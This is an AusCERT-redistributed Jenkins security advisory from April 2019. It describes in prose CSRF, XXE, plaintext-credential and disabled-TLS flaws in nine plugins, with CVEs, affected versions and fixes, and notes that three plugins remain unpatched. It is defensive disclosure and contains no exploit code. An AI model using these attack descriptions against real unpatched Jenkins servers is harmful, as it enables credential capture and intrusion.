Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2019.1455.2 Jenkins Security Advisory 2019-04-30 1 May 2019 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Jenkins plugins Publisher: Jenkins Operating System: Windows UNIX variants (UNIX, Linux, OSX) Impact/Access: Cross-site Request Forgery -- Remote with User Interaction Reduced Security -- Remote/Unauthenticated Access Confidential Data -- Existing Account Resolution: Patch/Upgrade CVE Names: CVE-2019-10307 CVE-2019-10308 CVE-2019-10317 CVE-2019-10309 CVE-2019-10310 CVE-2019-10311 CVE-2019-10312 CVE-2019-10318 CVE-2019-10313 CVE-2019-10314 CVE-2019-10315 CVE-2019-10316 Original Bulletin: https://jenkins.io/security/advisory/2019-04-30/ Revision History: May 1 2019: Security Advisory Released April 30 2019: Initial Release - --------------------------BEGIN INCLUDED TEXT-------------------- Jenkins Security Advisory 2019-04-30 This advisory announces vulnerabilities in the following Jenkins deliverables: * Ansible Tower Plugin * Aqua MicroScanner Plugin * Azure AD Plugin * GitHub Authentication Plugin * Koji Plugin * Self-Organizing Swarm Plug-in Modules Plugin * SiteMonitor Plugin * Static Analysis Utilities Plugin * Twitter Plugin Descriptions CSRF vulnerability and missing permission check allowed changing default graph configuration in Static Analysis Utilities Plugin SECURITY-1100 / CVE-2019-10307 (CSRF) and CVE-2019-10308 (permission check) Static Analysis Utilities Plugin has the capability to allow other plugins to display trend graphs for their static analysis results. Static Analysis Utilities Plugin provides the configuration form for the default settings of each graph. The configuration form and form submission handler did not perform a permission check, allowing attackers with Job/Read access to change the per-job graph configuration defaults for all users. Additionally, the form submission handler did not require POST requests, resulting in a cross-site request forgery vulnerability. Static Analysis Utilities Plugin now requires Job/Configure permission and POST requests to configure the per-job graph defaults for all users. SiteMonitor Plugin globally and unconditionally disables SSL/TLS certificate validation SECURITY-930 / CVE-2019-10317 SiteMonitor Plugin unconditionally disables SSL/TLS certificate validation for the entire Jenkins master JVM. SiteMonitor Plugin no longer does that. Instead, it now has an opt-in option to ignore SSL/TLS errors for each site check individually. XXE vulnerability via UDP broadcast response in Self-Organizing Swarm Plug-in Modules Plugin client SECURITY-1252 / CVE-2019-10309 Self-Organizing Swarm Plug-in Modules Plugin allows clients to auto-discover Jenkins instances on the same network through a UDP discovery request. Responses to this request are XML documents. Self-Organizing Swarm Plug-in Modules Plugin does not configure the XML parser in a way that would prevent XML External Entity (XXE) processing. This allows unauthenticated attackers on the same network to have Swarm clients parse a maliciously crafted XML response that uses external entities to read arbitrary files from the Swarm client or denial-of-service attacks. As of publication of this advisory, there is no fix. CSRF vulnerability and missing permission check in Ansible Tower Plugin allowed capturing credentials SECURITY-1355 (1) / CVE-2019-10310 (CSRF) and CVE-2019-10311 (permission check) Ansible Tower Plugin did not perform permission checks on a method implementing form validation. This allowed users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. Additionally, this form validation method did not require POST requests, resulting in a cross-site request forgery vulnerability. This form validation method now requires POST requests and Overall/Administer permissions. Users with Overall/Read access are able to enumerate credential IDs in Ansible Tower Plugin SECURITY-1355 (2) / CVE-2019-10312 Ansible Tower Plugin provides a list of applicable credential IDs to allow users configuring the plugin to select the one to use. This functionality did not check permissions, allowing any user with Overall/Read permission to get a list of valid credentials IDs. Those could be used as part of an attack to capture the credentials using another vulnerability. An enumeration of credentials IDs in this plugin now requires Overall/Administer permission. Azure AD Plugin stored credentials in plain text SECURITY-1390 / CVE-2019-10318 Azure AD Plugin stored the client secret unencrypted in the global config.xml configuration file on the Jenkins master. These credentials could be viewed by users with access to the master file system. Azure AD Plugin now stores the client secret encrypted. Twitter Plugin stores credentials in plain text SECURITY-1143 / CVE-2019-10313 Twitter Plugin stores credentials unencrypted in its global configuration file on the Jenkins master. These credentials could be viewed by users with access to the master file system. As of publication of this advisory, there is no fix. Koji Plugin globally and unconditionally disables SSL/TLS certificate validation SECURITY-936 / CVE-2019-10314 Koji Plugin unconditionally disables SSL/TLS certificate validation for the entire Jenkins master JVM. As of publication of this advisory, there is no fix. CSRF vulnerability in OAuth callback in GitHub Authentication Plugin SECURITY-443 / CVE-2019-10315 GitHub Authentication Plugin did not manage the state parameter of OAuth to prevent CSRF. This allowed an attacker to catch the redirect URL provided during the authentication process using OAuth and send it to the victim. If the victim was already connected to Jenkins, their Jenkins account would be attached to the attacker's GitHub account. The state parameter is now correctly managed. Aqua MicroScanner Plugin stored credentials in plain text SECURITY-1380 / CVE-2019-10316 Aqua MicroScanner Plugin stored credentials unencrypted in its global configuration file on the Jenkins master. These credentials could be viewed by users with access to the master file system. Aqua MicroScanner Plugin now stores credentials encrypted. Severity * SECURITY-443: Medium * SECURITY-930: Medium * SECURITY-936: Medium * SECURITY-1100: Medium * SECURITY-1143: Low * SECURITY-1252: Medium * SECURITY-1355 (1): Medium * SECURITY-1355 (2): Medium * SECURITY-1380: Low * SECURITY-1390: Low Affected Versions * Ansible Tower Plugin up to and including 0.9.1 * Aqua MicroScanner Plugin up to and including 1.0.5 * Azure AD Plugin up to and including 0.3.3 * GitHub Authentication Plugin up to and including 0.31 * Koji Plugin up to and including 0.3 * Self-Organizing Swarm Plug-in Modules Plugin up to and including 3.15 * SiteMonitor Plugin up to and including 0.5 * Static Analysis Utilities Plugin up to and including 1.95 * Twitter Plugin up to and including 0.7 Fix * Ansible Tower Plugin should be updated to version 0.9.2 * Aqua MicroScanner Plugin should be updated to version 1.0.6 * Azure AD Plugin should be updated to version 0.3.4 * GitHub Authentication Plugin should be updated to version 0.32 * SiteMonitor Plugin should be updated to version 0.6 * Static Analysis Utilities Plugin should be updated to version 1.96 These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated. As of publication of this advisory, no fixes are available for the following plugins: * Koji Plugin * Self-Organizing Swarm Plug-in Modules Plugin * Twitter Plugin Credit The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities: * Daniel Beck, CloudBees, Inc. for SECURITY-930, SECURITY-936 * Mark Combellack, CafeX Communications for SECURITY-1390 * Oleg Nenashev, CloudBees, Inc. for SECURITY-1100 * Peter Adkins of Cisco Umbrella for SECURITY-1252, SECURITY-1355 (1), SECURITY-1355 (2) - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIUAwUBXMjtfGaOgq3Tt24GAQjWlw/3daWOojn6MhBqtayQX1AgOH/p3TYpIb5m SUznMIW1x0yUMA4MP0zFYkepBJXZINdXrvjb9fgmiy0J+p8j8kI9eL4d3e5aXt7y DOjw4DkFEG4hTG1REbycGhi50I1+ZWk1GvQF9tNMyeow5Yvc/rykx65xH9ZaQ8kT T/KUp0A3zEfxpP9kORwstvS3IcWJHh7/MP03nY1R6dXoNxlKGpEce8wNOFhCjFtc qqQYs5oPzt7P01nlj4glj0dDW9iszUn164RmXXQM7fXHDuBQHJLPoqQRAHrhwjKw jkLcAx0VKCz2sHl4jYPU/h8OWglRS/TMRe0hk7hGsn+KOzp5odBGT3fx9He3Vz/9 zirkVKILGDlUHVuqEJpf9p4rhw7GOHPx9nF7p5c6u0cJ1LzG3cwOpaYXQbARIRN9 U/4MY5eictqHBdpIT5X0N/fHEvrh2/3RRy9huQjUB+5GxPmyiBGzrNdA/tFa3XY9 9u3VakiXhCIijoh2Fl9EaC/aJLyTxfqO8Ybx2qRemz3yU/sDtxKXFzgfft5ftI5r VryHU4kkcdoP9KFAX6BACDxcLvukFbs1OIvj5AfulRYd9X1Jd6VIKQD2wgdgU+zj xLsRA2FBQ1Os1nUIji1MrEBvkGMh7nK+jQ8QU103OF7p+WeVEqI532QXBAiHNefc 32vrqQMP2g== =GzaX -----END PGP SIGNATURE-----